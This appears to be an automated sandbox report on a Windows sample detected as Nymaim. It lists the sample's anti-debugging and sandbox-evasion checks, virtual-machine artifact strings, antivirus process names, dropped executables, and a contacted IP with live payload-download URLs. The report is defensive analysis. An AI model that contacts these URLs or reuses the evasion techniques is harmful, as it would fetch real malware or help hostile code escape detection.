May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 4312 Thread sleep count: 74 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1408 Thread sleep time: -42021s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4312 Thread sleep count: 68 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6380 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4312 Thread sleep count: 160 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4312 Thread sleep count: 126 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7440 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6176 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6384 Thread sleep time: -50025s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6504 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6448 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00417727 FindFirstFileExW, 1_2_00417727
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_10007EA9 FindFirstFileExW, 1_2_10007EA9
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0494798E FindFirstFileExW, 1_2_0494798E
Source: file.exe, file.exe, 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000001.00000002.2026166176.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWq\]
Source: Amcache.hve.14.dr Binary or memory string: VMware
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000001.00000002.2024454401.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2024454401.0000000000C08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.14.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.14.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.14.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005F2B1C rdtsc 1_2_005F2B1C
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040CDE3
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 1_2_00402A50
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_10007A76 mov eax, dword ptr fs:[00000030h] 1_2_10007A76
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_10005F25 mov eax, dword ptr fs:[00000030h] 1_2_10005F25
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04787D41 push dword ptr fs:[00000030h] 1_2_04787D41
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04930D90 mov eax, dword ptr fs:[00000030h] 1_2_04930D90
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493092B mov eax, dword ptr fs:[00000030h] 1_2_0493092B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00402EE0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc, 1_2_00402EE0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00409A2A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040CDE3
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040A58A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040A720 SetUnhandledExceptionFilter, 1_2_0040A720
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_10002ADF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_100056A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_10002FDA
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04939C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_04939C91
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0493A7F1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0493D04A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493A987 SetUnhandledExceptionFilter, 1_2_0493A987
Source: file.exe, 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Program Manager
Source: file.exe Binary or memory string: d+4Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040A2EC cpuid 1_2_0040A2EC
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 1_2_00410822
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Nymaim
Source: Yara match File source: 1.2.file.exe.4930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.4a20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1309173402.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1565534 Sample: file.exe Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 26 Found malware configuration 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Multi AV Scanner detection for dropped file 2->30 32 7 other signatures 2->32 6 file.exe 33 2->6         started        process3 dnsIp4 24 185.156.72.65, 49707, 80 ITDELUXE-ASRU Russian Federation 6->24 14 C:\Users\user\AppData\Local\...\Y-Cleaner.exe, PE32 6->14 dropped 16 C:\Users\user\...\Bunifu_UI_v1.5.3.dll, PE32 6->16 dropped 18 C:\Users\user\AppData\Local\...\soft[1], PE32 6->18 dropped 20 C:\Users\user\AppData\Local\...\dll[1], PE32 6->20 dropped 34 Detected unpacking (changes PE section rights) 6->34 36 Tries to detect sandboxes and other dynamic analysis tools (window names) 6->36 38 Tries to evade debugger and weak emulator (self modifying code) 6->38 40 4 other signatures 6->40 11 WerFault.exe 21 16 6->11         started        file5 signatures6 process7 file8 22 C:\ProgramData\Microsoft\...\Report.wer, Unicode 11->22 dropped
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.156.72.65
 unknown Russian Federation
44636 ITDELUXE-ASRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.156.72.65/soft/download false
    		high
    http://185.156.72.65/dll/key false
      		high
      http://185.156.72.65/files/download false
        		high
        http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub false
          		high
          http://185.156.72.65/dll/download false
            		high